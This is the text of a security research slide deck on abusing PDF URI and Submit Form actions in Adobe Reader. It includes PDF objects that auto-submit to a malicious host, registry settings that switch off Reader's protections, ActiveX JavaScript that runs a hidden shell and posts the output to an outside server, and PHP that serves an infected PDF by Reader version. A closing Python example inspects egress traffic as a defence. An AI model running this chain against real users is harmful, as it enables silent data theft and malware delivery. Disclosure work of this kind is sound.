Malicious URI resolving in PDFs
Valentin HAMON
Operational cryptology and virology laboratory (C+V)°
http://cvo-lab.blogspot.fr/
[email protected]-ouest.fr
Outline
- Introduction
- Network security in Adobe Reader
  - URI Method
  - Submit Form Method
  - Adobe URL Filter
- Weaknesses of Adobe's URL Security Zone Manager
- Attack Scenario 1: an invisible malicious proxy
- Attack Scenario 2: scouting Adobe Reader
- Conclusion
- Questions
Introduction (1/2)
- PDF format:
  - Primarily constituted of objects.
  - These objects can be dynamic:
    - JavaScript
    - Forms
    - Digital Media (SWF, ...)
    - ...
Introduction (2/2)
And we know that dynamic objects => security threats
/OpenAction
Introduction (3/3)
Previous works:
- Eric Filiol, Black Hat EU 2008: PDF Security analysis and malware threats.
- Raynal, Delugré and Aumaitre, Hack.lu 2009: Malicious Origami in PDF.
- Didier Stevens, Hack.lu 2009: Penetration document format.
Network security in Adobe Reader URI Method (1/5)
RFC 3986: "a Uniform Resource Identifier (URI) is a compact string of characters for identifying an abstract or physical resource".
A Uniform Resource Locator (URL) is a URI "that identify resources via a representation of their primary access mechanism".
Network security in Adobe Reader URI Method (2/5)
PDF reference 1.7: "a URI action causes a URI to be resolved". Many protocols are therefore supported:
- HTTP
- FTP
- MAILTO
- ...
Network security in Adobe Reader URI Method (3/5)
Code:
```
4 0 obj
<<
  /Type /Action
  /S /URI
  /URI (http://www.malicioussite.com/upload.php)
>>
endobj
```
Network security in Adobe Reader URI Method (4/5)
[Diagram: the Weblink plug-in passes the URI to the Weblink driver, which sends an IAC (Interapplication Communication) message to the default web browser, where the request is performed.]
Network security in Adobe Reader URI Method (5/5)
[Wireshark capture of the request launched by the URI action, with Internet Explorer 9 as the default browser: a GET request is performed.]
Network security in Adobe Reader Submit Form Method (1/8)
PDF reference 1.7: "a submit-form action transmits the names and values of selected interactive form fields to a specified uniform resource locator (URL)".
Network security in Adobe Reader Submit Form Method (2/8)
Code:
```
4 0 obj
<<
  /S /SubmitForm
  /F <<
    /F (http://www.malicioussite.com/upload.php)
    /FS /URL
  >>
>>
endobj
```
Network security in Adobe Reader Submit Form Method (3/8)
[Diagram: AcroForms performs the request; the results are viewed in the default web browser.]
Network security in Adobe Reader Submit Form Method (4/8)
Different file formats can be used by a PDF for transmitting form data:
- HTML Form format
- Forms Data Format (FDF)
- XFDF, the XML-based version of FDF
- PDF
Network security in Adobe Reader Submit Form Method (5/8)
[Wireshark capture of the request launched by the Submit Form action: a POST request is performed.]
Network security in Adobe Reader Submit Form Method (6/8)
The frame contains an FDF file:
Network security in Adobe Reader Submit Form Method (7/8)
Note about JavaScript:
```
4 0 obj
<<
  /S /JavaScript
  /JS (
    var aSubmitFields = new Array("0");
    this.submitForm({
      cURL: "http://www.malicioussite.com/upload.php",
      aFields: aSubmitFields,
      cSubmitAs: "FDF"
    });
  )
>>
endobj
```
Network security in Adobe Reader Submit Form Method (8/8)
But JavaScript has to be enabled in the user configuration: HKEY_CURRENT_USER\Software\Adobe\Acrobat Reader\9.0\JSPrefs => set to 0x00000001
Network security in Adobe Reader Adobe URL filter (1/7)
By default, an alert box appears:
Network security in Adobe Reader Adobe URL filter (2/7)
To allow every website: HKEY_CURRENT_USER\Software\Adobe\Acrobat Reader\9.0\TrustManager\cDefaultLaunchURLPerms => set value to 0x00000002
Network security in Adobe Reader Adobe URL filter (3/7)
There is also a filter on file types (ONLY for the Submit Form method):
- Accepted: .HTML, .PDF, .FDF, .PHP, .ASP, ... (web and Adobe files)
- Blocked: .EXE, .JS, .VBS, ...
Network security in Adobe Reader Adobe URL filter (4/7)
But there is no such filter for the URI method (it is the web browser's job):
- Accepted: ALL (including .exe, .vbs, etc.)
- Blocked: NONE (it may depend on the web browser)
Network security in Adobe Reader Adobe URL filter (5/7)
Demo
**Opening a PDF can cause the automatic download of a malicious file**
=> Social engineering
[Demo screenshots]
Web browser 1: Mozilla Firefox
Web browser 2: Microsoft Internet Explorer
Web browser 3: Google Chrome
Network security in Adobe Reader Adobe URL filter (6/7)
Disadvantages:
- Hard to find a method to automatically launch the downloaded file (ActiveX methods in IE could be used).
Advantages:
- Executables are well-known attacks; PDF attacks are less known.
- It works with every version of Adobe Reader.
![Page 33: Malicious)URIresolving)in)PDFs) - Black Hat Briefings URI-Ha… · Malicious)URIresolving)in)PDFs) ... Network)security)in)Adobe)Reader))URIMethod) ... launchthe malicious(PDF related(if](https://reader034.vdocuments.site/reader034/viewer/2022051507/5a78a5717f8b9a273b8c9183/html5/thumbnails/33.jpg)
Network security in Adobe Reader Adobe URL filter (7/7)
[Diagram: Step 1: force download of a big malicious executable. Step 2: launch a small shellcode by a JS exploit. Step 3: the shellcode launches the big executable that was downloaded.]
Weaknesses of Adobe’s URL Security Zone Manager (1/5)
Weaknesses of Adobe’s URL Security Zone Manager (2/5)
With the URI method: the security configuration of the zone is correctly applied.
Weaknesses of Adobe’s URL Security Zone Manager (3/5)
With the Submit Form method:
The web browser only knows this URI!!!
`C:\Users\CURRENT_USER\AppData\Local\Temp\AR95F6.htm`
Weaknesses of Adobe’s URL Security Zone Manager (4/5)
Weaknesses of Adobe’s URL Security Zone Manager (5/5)
**The web browser cannot know the real URL.** **Now imagine that a URL is normally blacklisted in a web browser. If we use Submit Form, the browser's filter cannot be applied to that URL.**
Weaknesses of Adobe’s URL Security Zone Manager (5/5)
With Adobe Reader version > 10:
- Protected Mode.
HKEY_CURRENT_USER\Software\Adobe\Acrobat Reader\10.0\Privileged\bProtectedMode
An invisible malicious proxy
An invisible malicious proxy (1/10) Step 1: Opening the PDF launches an HTTP request to the malicious server
- /OpenAction
- /SubmitForm action
An invisible malicious proxy (2/10) Step 2: AcroForms performs the request; the file is downloaded into AppData/…
- `C:\Users\CURRENT_USER\AppData\Local\Temp\AR95F6.htm`
An invisible malicious proxy (3/10) Step 3: Malicious actions are done on the victim's computer
Call a hidden shell:
- Create a new WScript.Shell ActiveX object
- Use the Run method to launch the shell (window style 0 = hidden, wait for completion)
```javascript
var wshShell = new ActiveXObject('WScript.Shell');
wshShell.Run('cmd.exe /c dir > C:/Temp/Mylog.txt', 0, true);
```
An invisible malicious proxy (4/10) Step 3: Malicious actions are done on the victim's computer
Read the file and store it in a JavaScript variable:
- Create a new Scripting.FileSystemObject ActiveX object
- Read the file (mode 1 = ForReading)
```javascript
var Object2 = new ActiveXObject('Scripting.FileSystemObject');
var New = Object2.OpenTextFile("C:/Temp/Mylog.txt", 1);
var read = New.ReadAll();
```
An invisible malicious proxy (5/10) Step 3: Malicious actions are done on the victim's computer
Erase the file on the disk:
- Create a new Scripting.FileSystemObject ActiveX object
- Open the file again in "erase" mode (mode 2 = ForWriting, which truncates it)
```javascript
var Object = new ActiveXObject('Scripting.FileSystemObject');
var NouvTxt = Object.OpenTextFile("C:/Temp/Mylog.txt", 2);
NouvTxt.Close();
```
An invisible malicious proxy (6/10) Step 3: Malicious actions are done on the victim's computer
Pros/cons of this attack (ActiveX):
Advantages:
- The shell is hidden.
- Results can be sent back to a server.
- Does not use AJAX (Asynchronous JavaScript and XML) requests.
Disadvantages:
- Works only with IE configured as the default web browser.
- Registry keys need to be set to allow ActiveX.
An invisible malicious proxy (7/10) Step 3: Malicious actions are done on the victim's computer
NOTE:
**This is just an example, but all attacks in web browsers can be used as long as the files are accepted by AcroForms.**
An invisible malicious proxy (8/10) Step 4: Send back results
Send back results to a web server:
- Create an empty hidden HTML form (the input needs an id for the getElementById call below):
```html
<form style="display: none; visibility: hidden" action="http://www.malicioussite.com" method="POST" name="form" enctype="multipart/form-data">
  <input type="hidden" id="file" name="file" value="">
</form>
```
- Put the data to send:
```javascript
document.getElementById("file").value = read;
```
- Auto-submit the form:
```javascript
document.form.submit();
```
An invisible malicious proxy (9/10) Step 5: Server-side reception in PHP
- Process the HTTP POST requests received:
```php
if (count($_POST) > 0) {
    ...
}
```
- Write the results to a file:
```php
fopen(); fputs(); fclose();
```
An invisible malicious proxy (10/10) Step 5: Server-side reception in PHP
- Auto-redirection to a legitimate website:
```html
<form style="display: none; visibility: hidden" action="http://www.google.com" method="POST" name="form" enctype="multipart/form-data"></form>
<script> document.form.submit(); </script>
```
An invisible malicious proxy (Demo)
Scouting Adobe Reader (1/4)
- Request performed:
Scouting Adobe Reader (2/4)
Server-side processing in PHP:
```php
<?php
// Read the request headers
$headers = apache_request_headers();
// Check for the Acrobat-Version information in the headers
foreach ($headers as $header => $value) {
    if ($header == "Acrobat-Version") {
        …
    }
}
// For a given version number, serve the malicious PDF that matches it.
// Note: after the loop $value holds the value of the last header iterated,
// so the Acrobat-Version value has to be saved inside the if block above.
if (preg_match("#9#", $value)) { // if Adobe version == 9.X
    header('Content-type: application/pdf');
    header('Content-Disposition: attachment; filename="infectedsimple.pdf"');
    readfile('infectedsimple.pdf');
}
```
Scouting Adobe Reader (3/4)
Scouting Adobe Reader (4/4)
In this scenario, we don't need JavaScript to know the Adobe Reader version!!!
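Both weaknesses above have the same defensive answer: the browser never sees the real URL of a Submit Form request, and the server fingerprints the client through the Acrobat-Version header, but a network egress proxy sees both the URL and the header. The following added example is mine, not code from the talk: it parses raw HTTP requests, tags the ones that carry Reader form submissions (FDF, XFDF or PDF bodies) or the Acrobat-Version header, and scrubs that header before forwarding. It assumes the MIME types application/vnd.fdf and application/vnd.adobe.xfdf for FDF and XFDF; the sample requests and version number are constructed.

```python
# Constructed sample requests, modelled on the captures described in the talk.
# The version number and the host are placeholders, not values from the slides.
READER_FDF_POST = (
    "POST /upload.php HTTP/1.1\r\n"
    "Host: www.malicioussite.com\r\n"
    "Acrobat-Version: 9.4\r\n"
    "Content-Type: application/vnd.fdf\r\n"
    "\r\n"
    "%FDF-1.2\n1 0 obj << /FDF << /Fields [] >> >> endobj\n%%EOF\n"
)
READER_XFDF_POST = (
    "POST /upload.php HTTP/1.1\r\n"
    "Host: www.malicioussite.com\r\n"
    "Acrobat-Version: 9.4\r\n"
    "Content-Type: application/vnd.adobe.xfdf\r\n"
    "\r\n"
    '<?xml version="1.0"?>\n<xfdf xmlns="http://ns.adobe.com/xfdf/"><fields/></xfdf>\n'
)
BROWSER_GET = (
    "GET /upload.php HTTP/1.1\r\n"
    "Host: www.malicioussite.com\r\n"
    "User-Agent: Mozilla/5.0 (constructed sample)\r\n"
    "\r\n"
)

FORM_TAGS = ("fdf-submit", "xfdf-submit", "pdf-submit")


def parse_request(raw: str) -> dict:
    """Split a raw HTTP/1.1 request into method, target, headers and body.
    Header names are lower-cased so lookups are case-insensitive."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "headers": headers, "body": body}


def classify_request(req: dict) -> list:
    """Tags that mark a request as Adobe Reader traffic. The fingerprint header
    is tagged on its own; a POST body is tagged by the form data format it
    carries. The HTML-form format is plain urlencoded data and is only told
    apart from a browser submission by the header."""
    tags = []
    if "acrobat-version" in req["headers"]:
        tags.append("acrobat-version-header")
    body = req["body"].lstrip()
    ctype = req["headers"].get("content-type", "").lower()
    if req["method"] == "POST":
        if body.startswith("%FDF") or "vnd.fdf" in ctype:
            tags.append("fdf-submit")
        elif "<xfdf" in body or "vnd.adobe.xfdf" in ctype:
            tags.append("xfdf-submit")
        elif body.startswith("%PDF"):
            tags.append("pdf-submit")
    return tags


def scrub_acrobat_version(raw: str) -> str:
    """Drop the Acrobat-Version header before forwarding, so a server cannot
    choose a PDF by Reader version (the scouting scenario). Everything else,
    including the body, is passed through unchanged."""
    head, sep, body = raw.partition("\r\n\r\n")
    kept = [line for line in head.split("\r\n")
            if not line.lower().startswith("acrobat-version:")]
    return "\r\n".join(kept) + sep + body


def inspect(raw: str) -> dict:
    """Egress-side summary: the real destination (which the browser's URL filter
    never saw), the tags, and whether this is a Reader form submission that a
    URL policy should be applied to."""
    req = parse_request(raw)
    tags = classify_request(req)
    return {"destination": req["headers"].get("host", "") + req["target"],
            "tags": tags,
            "form_submission": any(t in FORM_TAGS for t in tags)}


if __name__ == "__main__":
    for sample in (READER_FDF_POST, READER_XFDF_POST, BROWSER_GET):
        print(inspect(sample))
```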
Conclusion
- /OpenAction still works.
- Try new methods to anticipate future threats.
- Weak URL detection.
Future Works
- Compare the security of different PDF readers.
- Analyze the security of PDFs on smartphones.
- Explore other operating systems (Linux, Mac OS X).
Thank you for your attention. Any questions???
Valentin HAMON
valentin[email protected]-ouest.fr